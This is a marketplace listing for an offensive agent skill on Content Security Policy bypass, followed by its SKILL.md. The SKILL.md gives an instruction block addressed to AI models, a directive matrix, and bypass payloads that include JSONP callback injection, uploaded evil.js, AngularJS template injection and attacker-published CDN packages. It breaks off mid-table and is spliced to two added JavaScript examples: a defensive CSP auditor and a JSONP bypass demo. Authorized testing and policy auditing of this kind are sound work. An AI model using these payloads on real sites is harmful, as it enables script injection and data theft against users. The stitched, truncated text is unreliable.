
Csp Bypass Advanced
Authorized security testing when XSS or data exfiltration is blocked by a strict Content Security Policy and you need directive-level bypass paths.
Overview
csp-bypass-advanced is an agent skill for the Ship phase (also Build integrations testing) that documents advanced Content Security Policy bypass and exfiltration techniques for authorized security assessments.
Install
npx skills add https://github.com/yaklang/hack-skills --skill csp-bypass-advanced
What is this skill?
- Per-directive CSP reference matrix covering default-src, script-src, and the related -src directives, including default-src fallback behavior
- Nonce/hash abuse and trusted CDN exploitation patterns
- Data exfiltration channels when script execution stays blocked
- Routes to five related hack-skills (XSS, dangling markup, CRLF, WAF bypass, clickjacking)
- Flags common model mistakes (assuming unsafe-inline is usable without verifying the policy actually allows it)
Adoption & trust: 1.1k installs on skills.sh; 980 GitHub stars; 1/3 security scanners passed (skills.sh audits).
What problem does it solve?
Your XSS or exfil proof-of-concept stops at the browser because script-src, connect-src, or related directives block execution and outbound channels.
Who is it for?
Builders or testers doing authorized web app pentests, bug bounty, or pre-launch CSP audits on SaaS and extension frontends.
Skip if: Unauthorized testing, teams without a written scope, or non-technical founders who only need a default CSP template without offensive analysis.
When should I use this skill?
XSS or data exfiltration is blocked by CSP and you need policy weaknesses, trusted endpoint abuse, nonce leakage, or exfiltration channels CSP cannot block.
What do I get? / Deliverables
You get a directive-aware bypass and exfiltration playbook tied to real policy gaps, with routing to XSS, dangling markup, CRLF, WAF, and clickjacking skills for the next testing step.
- Directive-level bypass hypothesis list mapped to observed CSP headers
- Recommended follow-on skill routes (XSS, dangling markup, CRLF, WAF, clickjacking)
Journey fit
Spans multiple journey phases - primary shelf plus alternate fits below.
CSP weaknesses are exercised during pre-release and ongoing security review of web apps, not during initial idea or growth copy work. Canonical shelf is ship → security because the skill maps bypass techniques to policy directives before or after launch hardening.
Where it fits
Validate third-party script allowlists while integrating analytics or payment SDKs that tighten script-src.
Run a pre-release CSP audit after enabling strict headers on the staging SaaS frontend.
Re-test policy regressions after a hotfix changes connect-src or frame-ancestors in production.
How it compares
Use for deep CSP weakness mapping during authorized reviews—not as a substitute for setting a strict baseline policy in application code.
Common Questions / FAQ
Who is csp-bypass-advanced for?
Developers and security testers who legally assess web apps where CSP blocks script-based XSS or exfil and need structured bypass research.
When should I use csp-bypass-advanced?
During ship security reviews of staging or production-like builds, when validating a reported XSS after CSP hardening, or when pairing WAF blocks with policy-level gaps before launch.
Is csp-bypass-advanced safe to install?
Review the Security Audits panel on this Prism page and only use the skill inside authorized engagements; offensive content requires strict scope and legal permission.
SKILL.md - Csp Bypass Advanced
# SKILL: CSP Bypass — Advanced Techniques

> **AI LOAD INSTRUCTION**: Covers per-directive bypass techniques, nonce/hash abuse, trusted CDN exploitation, data exfiltration despite CSP, and framework-specific bypasses. Base models often suggest an `unsafe-inline` bypass without checking whether the CSP actually allows it (a nonce or hash in the same directive disables `'unsafe-inline'`), or miss the critical `base-uri` and `object-src` gaps.

## 0. RELATED ROUTING

- [xss-cross-site-scripting](../xss-cross-site-scripting/SKILL.md) for XSS vectors to deliver after CSP bypass
- [dangling-markup-injection](../dangling-markup-injection/SKILL.md) when CSP blocks scripts but HTML injection exists — exfiltrate without JS
- [crlf-injection](../crlf-injection/SKILL.md) when CRLF can inject a CSP header or steal a nonce via response splitting
- [waf-bypass-techniques](../waf-bypass-techniques/SKILL.md) when both WAF and CSP must be bypassed
- [clickjacking](../clickjacking/SKILL.md) when CSP lacks `frame-ancestors` — clickjacking is still possible

---

## 1. CSP DIRECTIVE REFERENCE MATRIX

| Directive | Controls | Default Fallback |
|---|---|---|
| `default-src` | Fallback for all `-src` directives not explicitly set | None (browser default: allow all) |
| `script-src` | JavaScript execution | `default-src` |
| `style-src` | CSS loading | `default-src` |
| `img-src` | Image loading | `default-src` |
| `connect-src` | XHR, fetch, WebSocket, EventSource | `default-src` |
| `frame-src` | iframe/frame sources | `child-src`, then `default-src` |
| `font-src` | Font loading | `default-src` |
| `object-src` | `<object>`, `<embed>`, `<applet>` | `default-src` |
| `media-src` | `<audio>`, `<video>` | `default-src` |
| `base-uri` | `<base>` element | **No fallback** — unrestricted if absent |
| `form-action` | Form submission targets | **No fallback** — unrestricted if absent |
| `frame-ancestors` | Who can embed this page (replaces X-Frame-Options) | **No fallback** — unrestricted if absent |
| `report-uri` / `report-to` | Where violation reports are sent | N/A |
| `navigate-to` | Navigation targets (never shipped in stable browsers; removed from the CSP3 draft) | **No fallback** |

**Critical insight**: `base-uri`, `form-action`, and `frame-ancestors` do NOT fall back to `default-src`. Their absence is always a potential bypass vector.

---

## 2. BYPASS TECHNIQUES BY DIRECTIVE

### 2.1 `script-src 'self'`

The app only allows scripts from its own origin. `'self'` matches scheme, host and port only; the path and query are not checked. Bypass vectors:

| Vector | Technique |
|---|---|
| JSONP endpoints | `<script src="/api/jsonp?callback=alert(1)//"></script>` — JSONP reflects the callback as JS |
| Uploaded JS files | Upload a `.js` file (e.g., an avatar upload that accepts any extension) and serve it with a script-compatible Content-Type (with `X-Content-Type-Options: nosniff` a mismatched type is blocked) → `<script src="/uploads/evil.js"></script>` |
| DOM XSS sinks | Find DOM sinks (innerHTML, eval, document.write) in existing same-origin JS — inject via URL fragment/param |
| Angular/Vue template injection | If the framework is loaded from `'self'`, inject template expressions: `{{constructor.constructor('alert(1)')()}}` (AngularJS builds without the expression sandbox) |
| Service Worker | Register a same-origin SW script → intercept and modify responses |
| Path confusion | `<script src="/user-content/;/legit.js">` — server returns user content due to path parsing, but the URL matches `'self'` |

### 2.2 `script-src` with CDN Whitelist

```
script-src 'self' *.googleapis.com *.gstatic.com cdn.jsdelivr.net
```

| Whitelisted CDN | Bypass |
|---|---|
| `cdnjs.cloudflare.com` | cdnjs hosts only known libraries, but some contain eval-like sinks: load an old `angular.js` build → template injection |
| `cdn.jsdelivr.net` | jsdelivr serves any npm package or GitHub file: `cdn.jsdelivr.net/npm/attacker-package@1.0.0/evil.js` |
| `*.googleapis.com` | Google JSONP endpoints, Google Maps callback parameter |
| `unpkg.com` | Same as jsdelivr — serves arbitrary npm packages |
| `*.cloudfront.net` | Cloud
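The following audit script is an added example, not code from the hack-skills project or the skill's own tooling. It parses a CSP header, resolves each fetch directive through the fallback chain described in the matrix above, and flags the gaps the matrix and the CDN table call out: missing `base-uri`/`form-action`/`frame-ancestors`, `'unsafe-inline'` that is silently disabled by a nonce or hash, wildcard hosts, and allowlisted hosts that serve attacker-publishable or eval-capable scripts. The `OPEN_CDN_HOSTS` list and the sample header are assumptions drawn from the tables above, not a complete list or a captured policy.

```javascript
// Added example (not code from the hack-skills project): parse a CSP header,
// resolve each fetch directive through its fallback chain, and flag the gaps
// the matrix above describes. OPEN_CDN_HOSTS is illustrative, not exhaustive.

// Fallback chain per directive, in the order a browser consults them.
// base-uri, form-action and frame-ancestors have no fallback at all.
const FALLBACK = {
  "script-src": ["default-src"],
  "style-src": ["default-src"],
  "img-src": ["default-src"],
  "connect-src": ["default-src"],
  "font-src": ["default-src"],
  "object-src": ["default-src"],
  "media-src": ["default-src"],
  "frame-src": ["child-src", "default-src"],
  "worker-src": ["child-src", "script-src", "default-src"],
  "base-uri": [],
  "form-action": [],
  "frame-ancestors": [],
};

// Hosts that serve attacker-publishable packages or eval-capable libraries.
const OPEN_CDN_HOSTS = ["cdn.jsdelivr.net", "unpkg.com", "cdnjs.cloudflare.com"];

// Split "directive value value; directive ..." into a Map. Browsers honour the
// first occurrence of a directive and ignore later duplicates.
function parseCsp(header) {
  const policy = new Map();
  for (const part of header.split(";")) {
    const [name, ...values] = part.trim().split(/\s+/).filter(Boolean);
    if (name && !policy.has(name.toLowerCase())) policy.set(name.toLowerCase(), values);
  }
  return policy;
}

// Walk the fallback chain; values === null means the directive is unrestricted.
function effectiveSources(policy, directive) {
  for (const name of [directive, ...(FALLBACK[directive] || [])]) {
    if (policy.has(name)) return { from: name, values: policy.get(name) };
  }
  return { from: null, values: null };
}

function hostOf(source) {
  return source.replace(/^[a-z]+:\/\//i, "").split("/")[0].toLowerCase();
}

function auditCsp(header) {
  const policy = parseCsp(header);
  const findings = [];
  const add = (directive, issue, detail) => findings.push({ directive, issue, detail });

  for (const d of ["base-uri", "form-action", "frame-ancestors"]) {
    if (!policy.has(d)) add(d, "absent-no-fallback", `${d} missing; it does not inherit default-src`);
  }

  const script = effectiveSources(policy, "script-src");
  if (script.values === null) {
    add("script-src", "unrestricted", "neither script-src nor default-src is set");
  } else {
    const v = script.values;
    const nonceOrHash = v.some((s) => /^'(nonce-|sha(256|384|512)-)/.test(s));
    if (v.includes("'unsafe-inline'")) {
      // Common mistake: a nonce or hash in the same directive disables 'unsafe-inline'.
      if (nonceOrHash) add("script-src", "unsafe-inline-ignored", "nonce/hash present, 'unsafe-inline' has no effect");
      else add("script-src", "unsafe-inline", "inline script injection is allowed");
    }
    if (v.includes("'strict-dynamic'")) {
      add("script-src", "strict-dynamic", "host allowlist ignored; look for nonce leakage or script-created scripts");
    } else {
      for (const s of v) {
        if (s === "*" || /^https?:$/.test(s) || hostOf(s).startsWith("*.")) add("script-src", "wildcard-source", s);
        else if (OPEN_CDN_HOSTS.includes(hostOf(s))) add("script-src", "open-cdn", `${s} serves attacker-controlled or eval-capable scripts`);
      }
    }
  }

  const obj = effectiveSources(policy, "object-src");
  if (obj.values === null || !obj.values.includes("'none'")) {
    add("object-src", "plugins-allowed", obj.from ? `resolved via ${obj.from}` : "unrestricted");
  }
  return findings;
}

// Constructed sample header for the demo, not captured from any real site.
const SAMPLE = "default-src 'self'; script-src 'self' 'unsafe-inline' 'nonce-r4nd0m' *.googleapis.com cdn.jsdelivr.net; object-src 'none'; frame-ancestors 'none'";
for (const f of auditCsp(SAMPLE)) console.log(`${f.directive}: ${f.issue} (${f.detail})`);
```

Run it against a header copied from a response (or the `Content-Security-Policy-Report-Only` variant, which enforces nothing) and use the findings as the hypothesis list for the directives in this section; a `plugins-allowed` finding resolved via `default-src 'self'` is the `object-src` gap the load instruction warns about.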
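To make the JSONP row in section 2.1 concrete, here is an added example (not code from the hack-skills project) that builds the response body of a same-origin JSONP handler in its reflected, vulnerable form and beside it the hardened form, and shows why `'self'` does not help: the source expression matches the origin only, never the path or query. The endpoint path `/api/jsonp`, the origin `https://app.example` and the callback names are assumptions for illustration.

```javascript
// Added example (not code from the hack-skills project): why a JSONP endpoint
// turns `script-src 'self'` into a bypass, and the callback validation that
// closes it. /api/jsonp and https://app.example are illustrative assumptions.

// 'self' matches scheme+host+port only; path and query are not checked, so any
// same-origin endpoint that reflects input into a script body is in scope.
function matchesSelf(scriptUrl, pageOrigin) {
  return new URL(scriptUrl, pageOrigin).origin === pageOrigin;
}

// Vulnerable handler: reflects the callback parameter verbatim, so
// callback=alert(1)// yields "alert(1)//({...});" and the JSON becomes a comment.
function jsonpVulnerable(callback, data) {
  return `${callback}(${JSON.stringify(data)});`;
}

// Hardened handler: accept only dotted identifiers, and prefix the body with
// a comment so the response cannot be reinterpreted as another format.
const CALLBACK_RE = /^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*$/;
function jsonpHardened(callback, data) {
  if (!CALLBACK_RE.test(callback)) throw new Error("invalid JSONP callback");
  return `/**/ typeof ${callback} === "function" && ${callback}(${JSON.stringify(data)});`;
}

// The tag an attacker injects: same origin, so script-src 'self' allows it.
function bypassTag(pageOrigin, callback) {
  const u = new URL("/api/jsonp", pageOrigin);
  u.searchParams.set("callback", callback);
  return `<script src="${u.pathname}${u.search}"></script>`;
}

const PAGE = "https://app.example"; // assumed target origin
const payload = "alert(document.domain)//";
console.log(matchesSelf("/api/jsonp?callback=x", PAGE)); // true: allowed by 'self'
console.log(bypassTag(PAGE, payload));
console.log(jsonpVulnerable(payload, { ok: true }));
```

The hardened variant still needs the real handler to send `Content-Type: application/javascript` and `X-Content-Type-Options: nosniff`; the callback check only removes the reflected-code sink, it does not make the endpoint safe to allowlist under `'self'` if other parameters are reflected.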